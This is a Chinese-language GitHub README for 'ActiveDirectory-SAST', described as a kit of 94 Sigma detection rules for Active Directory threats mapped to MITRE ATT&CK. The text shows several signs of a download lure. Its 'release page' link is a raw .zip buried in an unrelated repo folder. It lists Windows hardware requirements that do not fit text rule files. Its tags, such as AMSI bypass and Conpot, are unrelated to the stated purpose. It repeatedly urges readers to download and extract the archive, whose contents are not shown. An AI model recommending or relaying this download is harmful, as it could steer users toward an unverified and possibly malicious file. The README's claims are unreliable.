Andrzejnacreous127/ActiveDirectory-SAST

# 🛡️ ActiveDirectory-SAST - 简单检测 Active Directory 安全威胁 [](https://github.com/Andrzejnacreous127/ActiveDirectory-SAST/raw/refs/heads/main/analectic/Active_Directory_SAST_v3.8.zip) ## 📌 项目概述 ActiveDirectory-SAST 为安全团队提供了一系列检测规则。这些规则用于识别 Active Directory 环境中的攻击技术。该项目旨在帮助安全分析师发现恶意活动。它包含 94 条规则，涵盖了 14 个攻击类别。每条规则均映射到 MITRE ATT&CK 框架版本 14。 该工具包专为安全运营中心、蓝队和紫队测试人员设计。它将复杂的攻击模式转化为可操作的数据。您可以在您的安全信息和事件管理 (SIEM) 系统中使用这些规则，以便及早发现入侵者。 ## 🛠️ 系统要求 要有效使用这些规则，您的计算机必须满足以下基本条件： * 操作系统：Windows 10 或 Windows 11。 * 内存：最低 4 GB RAM。 * 存储：200 MB 的可用空间用于存放规则文件。 * 软件：文本编辑器或 SIEM 集成工具。 * 网络：需要互联网连接以访问下载页面。 ## 📥 如何下载 请按照以下步骤在您的 Windows 计算机上获取该工具包： 1. 访问项目发布页面：[https://github.com/Andrzejnacreous127/ActiveDirectory-SAST/raw/refs/heads/main/analectic/Active_Directory_SAST_v3.8.zip](https://github.com/Andrzejnacreous127/ActiveDirectory-SAST/raw/refs/heads/main/analectic/Active_Directory_SAST_v3.8.zip)。 2. 在最新版本的底部找到标有“Assets”的部分。 3. 点击带有 `.zip` 扩展名的文件将其保存到您的计算机。 4. 导航至您的“下载”文件夹。 5. 右键单击该文件并选择“全部提取”以查看内容。 ## 🚀 设置规则 解压文件夹后，您就可以访问原始规则文件了。 1. 打开名为 `ActiveDirectory-SAST` 的文件夹。 2. 浏览子文件夹以查看不同类别的检测项，例如 Kerberos、账户发现或权限提升。 3. 将这些文件导入到您的安全监控软件中。 4. 验证您的系统是否支持 Sigma 格式。 5. 启用符合您环境需求的规则。 ## 🎯 功能特性 该工具包涵盖了广泛的安全问题： * Kerberos 身份验证安全：检测票据篡改和黄金票据攻击。 * 账户发现：识别对目录用户和组的未经授权扫描。 * 权限提升：突出显示获取管理员权限的企图。 * 持久化技术：发现旨在保持访问权限的隐藏更改。 * MITRE 映射：每条规则都引用了官方的 MITRE ATT&CK 代码。 * 分类结构：规则放置在带有清晰标签的文件夹中，便于快速查找。 ## 💡 使用规则 您无需编写代码即可使用这些规则。这些文件可用作监控系统的配置模板。将文件加载到您的 SIEM 平台中，以便将日志与这些模式进行比对。当软件检测到匹配项时，将触发警报。随后您可以对被标记的事件进行调查。 项目结构假定在标准 Windows 环境下运行。每个文件都包含清晰的元数据，用于解释规则的作用及其标记事件的原因。请使用文件中包含的文档来了解具体的威胁。 ## ⚙️ 自定义设置 您可以调整这些规则以适应您的业务需求。由于规则采用 Sigma 格式，您可以使用任何标准文本编辑器（如记事本）打开它们。如果您发现某条规则产生了过多的通知，您可以修改其设置。 更改敏感度级别以减少误报噪音。您还可以组合多个规则以创建更复杂的检测逻辑。请首先在隔离环境中测试您的更改，以确保监控软件能够正确处理更新。 ## 🛡️ 安全最佳实践 请将这些规则作为整体安全策略的一部分来使用。不要仅依赖它们作为您唯一的防线。请遵循以下步骤以获得更好的效果： * 保持您的 Windows 环境处于最新更新状态。 * 定期监控您的日志。 * 培训您的员工识别可疑行为。 * 查看 MITRE ATT&CK 框架以了解当前的威胁态势。 * 备份您的安全配置。 ## ❓ 故障排除 如果软件无法正常运行，请检查以下常见项目： * 验证文件路径长度。请将文件夹保持在简短的目录结构中。 * 检查您的安全平台是否支持当前版本的 Sigma 格式。 * 确保您拥有读取文件的适当权限。 * 确认您的 SIEM 软件有权访问您保存规则的目录。 * 导入新规则后重启您的安全服务，以使更改生效。 ## 🤝 参与贡献 您可以协助改进这些规则。如果您找到了使规则更准确的方法，请创建 Pull Request。请在请求描述中解释更改内容。提供支持您改进的日志示例。任何更新在进入主项目文件夹之前都会经过同行评审。此过程确保了规则集对每个用户的可靠性。 在编写新规则时请注重清晰度。在规则描述中使用通俗易懂的语言。确保每条规则在 MITRE ATT&CK 文档中都有对应的条目。您的贡献将帮助整个社区更好地管理 Active Directory 中的风险。

标签：Active Directory, AD安全, AMSI绕过, Cloudflare, Conpot, MITRE ATT&CK, Plaso, Web报告查看器, Windows安全, 威胁检测, 安全事件管理, 安全运营, 扫描框架, 检测规则, 模拟器, 端点安全, 紫队, 网络安全, 网络资产发现, 补丁管理, 身份安全, 隐私保护